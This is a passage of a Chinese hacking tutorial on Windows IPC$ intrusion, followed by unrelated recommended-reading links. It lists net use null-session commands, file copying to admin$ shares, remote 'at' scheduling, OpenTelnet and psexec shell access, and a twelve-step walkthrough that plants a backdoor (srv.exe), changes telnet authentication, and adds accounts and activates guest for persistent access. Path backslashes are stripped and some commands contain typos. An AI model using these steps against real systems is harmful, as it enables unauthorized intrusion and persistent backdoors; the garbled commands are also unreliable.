1 建立 / 删除 ipc$ 连接的命令
1 )建立空连接 :
net use 127.0.0.1ipc$ "" /user:""
2 )建立非空连接 :
net use 127.0.0.1ipc$ " 密码 " /user:" 用户名 "
3 )删除连接 :
net use 127.0.0.1ipc$ /del
2 在 ipc$ 连接中对远程主机的操作命令
1 ) 查看远程主机的共享资源(看不到默认共享) :
net view 127.0.0.1
2 ) 查看远程主机的当前时间 :
net time 127.0.0.1
3 ) 得到远程主机的 netbios 用户名列表 :
nbtstat -A 127.0.0.1
4 )映射 / 删除远程共享 :
net use z: 127.0.0.1c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del
删除映射的 z 盘,其他盘类推
5 )向远程主机复制文件 :
copy 路径 文件名 IP 共享目录名,如:
copy c:xinxin.exe 127.0.0.1c$ 即将 c 盘下的 xinxin.exe 复制到对方 c 盘内
当然 , 你也可以把远程主机上的文件复制到自己的机器里:
copy 127.0.0.1c$xinxin.exe c:
6 )远程添加计划任务 :
at IP 时间 程序名 如:
at 127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用 24 小时制;如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径
3 本地命令
1 )查看本地主机的共享资源(可以看到本地的默认共享)
net share
2 )得到本地主机的用户列表
net user
3 )显示本地某用户的帐户信息
net user 帐户名
4 )显示本地主机当前启动的服务
net start
5 )启动 / 关闭本地服务
net start 服务名
net stop 服务名
6 )在本地添加帐户
net user 帐户名 密码 /add
7 )激活禁用的用户
net uesr 帐户名 /active:yes
8 )加入管理员组
net localgroup administrators 帐户名 /add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的 shell 中输入,比如你 telnet 成功后输入上面这些命令 , 那么这些本地输入将作用在远程主机上 。
4 其他一些命令
1 ) telnet
telnet IP 端口
telnet 127.0.0.0 23
2 )用 opentelnet.exe 开启远程主机的 telnet
OpenTelnet.exe ip 管理员帐号 密码 NTLM 的认证方式 port
OpenTelnet.exe 127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1 )目标开启了 ipc$ 共享
2 )你要拥有管理员密码和帐号
3 )目标开启 RemoteRegistry 服务,用户就可以更改 ntlm 认证
4 )对仅 WIN2K/XP 有效
3 )用 psexec.exe 一步获得 shell,需要 ipc 管道支持
psexec.exe IP -u 管理员帐号 -p 密码 cmd
psexec.exe 127.0.0.1 -u administrator -p "" cmd
十三 对比过去和现今的 ipc$ 入侵
既然是对比,那么我就先把过去的 ipc$ 入侵步骤写给大家,都是蛮经典的步骤:
[1]
C:>net use 127.0.0.1ipc$ "" /user:admintitrators
用扫到的空口令建立连接
[2]
c:>net view 127.0.0.1
查看远程的共享资源
[3]
C:>copy srv.exe 127.0.0.1admin$system32
将一次性后门 srv.exe 复制到对方的系统文件夹下 , 前提是 admin$ 开启
[4]
C:>net time 127.0.0.1
查看远程主机的当前时间
[5]
C:>at 127.0.0.1 时间 srv.exe
用 at 命令远程运行 srv.exe , 需要对方开启了 'Task Scheduler' 服务
[6]
C:>net time 127.0.0.1
再次查看当前时间来估算 srv.exe 是否已经运行,此步可以省略
[7]
C:>telnet 127.0.0.1 99
开一个新窗口,用 telnet 远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思?那你就把它想象成远程机器的控制权就好了,操作像 DOS),99 端口是 srv.exe 开的一次性后门的端口
[8]
C:WINNTsystem32>net start telnet
我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务,毕竟 srv.exe 是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的 telnet 已经启动 , 此步可省略
[9]
C:>copy ntlm.exe 127.0.0.1admin$system32
在原来那个窗口中将 ntlm.exe 传过去,ntlm.exe 是用来更改 telnet 身份验证的
[10]
C:WINNTsystem32>ntlm.exe
在 shell 窗口中运行 ntlm.exe , 以后你就可以畅通无阻的 telnet 这台主机了
[11]
C:>telnet 127.0.0.1 23
在新窗口中 telnet 到 127.0.0.1 , 端口 23 可省略,这样我们又获得一个长期的后门
[12]
C:WINNTsystem32>net user 帐户名 密码 /add
C:WINNTsystem32>net uesr guest /active:yes
推荐阅读
- TCP/IP中3688端口是什么? 36984端口
- 打印机端口如何设置 打印机输出端口怎么设置
- 2023重庆自考报名流程及费用 2023重庆自考报名流程
- 2020年大连高中寒假放假时间表 大连高中2023年秋季开学时间
- DXO最新前置拍摄榜单中小米力压华为,夺得榜单第三,国产品牌第一名,你怎么看?
- 长沙教资面试考试时间 2022下半年长沙教资面试成绩公布时间
- 2023年上半年重庆市自考报名 重庆自考报名时间2021具体时间
- 江西赣州免费国产二价接种年龄规定2023
- 2023宁波九龙湖半程马拉松有报名费折扣吗